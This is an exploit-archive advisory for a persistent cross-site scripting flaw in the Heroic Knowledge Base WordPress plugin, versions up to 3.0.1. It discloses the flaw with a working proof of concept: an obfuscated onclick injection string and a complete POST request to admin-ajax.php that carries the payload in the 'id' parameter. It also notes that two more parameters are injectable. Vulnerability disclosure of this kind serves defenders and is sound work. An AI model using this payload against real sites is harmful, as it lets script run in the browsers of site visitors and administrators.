Heroic Knowledge Base 3.0.1 Cross Site Scripting

2020.11.28

Credit: begininvoke

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

#Exploit Title : Heroic Knowledge Base Plugin <= 3.0.1 - Persistent Cross Site Scripting
#Exploit Author : begininvoke
#Exploit Date : 2020-11-27
#Vendor Homepage : https://herothemes.com
[+] Proof Of Concept:
=====================
# HTML Code #
<div class="ht-voting" id ="ht-voting-post-\"/**/(/* */oNcliCk=alert(1399) )//">
# Methode POST #
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.3
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://site.com/knowledge-base/research-strategy-development-roadmap-rsdr/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 122
Connection: close
action=ht_voting&direction=up&type=post&nonce=6d2ea5db0f&id="/**/(/* */oNcliCk=alert(1399) )//&allow=anon&display=standard
Parameters allow & display are also vulnerable

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Heroic Knowledge Base 3.0.1 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.